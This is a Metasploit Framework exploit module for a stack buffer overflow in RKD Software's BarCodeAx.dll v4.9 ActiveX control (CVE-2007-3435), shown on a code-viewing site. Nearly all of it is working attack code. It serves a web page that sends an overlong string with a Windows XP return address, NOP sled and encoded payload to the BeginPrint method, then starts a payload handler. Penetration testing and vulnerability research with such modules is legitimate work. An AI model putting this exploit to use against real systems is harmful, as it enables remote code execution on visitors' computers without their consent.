Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/barcode_ax49.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in RKD Software Barcode Application

18
          ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint

19
          method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [ 'Trancek <trancek[at]yashira.org>', 'aushack' ],

23
        'References' => [

24
          [ 'EDB', '4094' ],

25
          [ 'OSVDB', '37482' ],

26
          [ 'BID', '24596' ],

27
          [ 'CVE', '2007-3435' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Payload' => {

33
          'Space' => 1024,

34
          'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",

35
          'StackAdjustment' => -3500,

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll aushack xpsp0

40
        ],

41
        'DisclosureDate' => '2007-06-22',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50
  end

51


52
  def autofilter

53
    false

54
  end

55


56
  def check_dependencies

57
    use_zlib

58
  end

59


60
  def on_request_uri(cli, request)

61
    # Re-generate the payload

62
    return if ((p = regenerate_payload(cli)) == nil)

63


64
    # Randomize some things

65
    vname = rand_text_alpha(rand(100) + 1)

66


67
    buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded

68


69
    # Build out the message

70
    content = %Q|<html>

71
<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='#{vname}'></object>

72
<script language='javascript'>

73
#{vname}.BeginPrint("#{buff}");

74
</script>

75
</html>

76
|

77


78
    print_status("Sending #{self.name}")

79


80
    # Transmit the response to the client

81
    send_response_html(cli, content)

82


83
    # Handle the payload

84
    handler(cli)

85
  end

86
end

87


88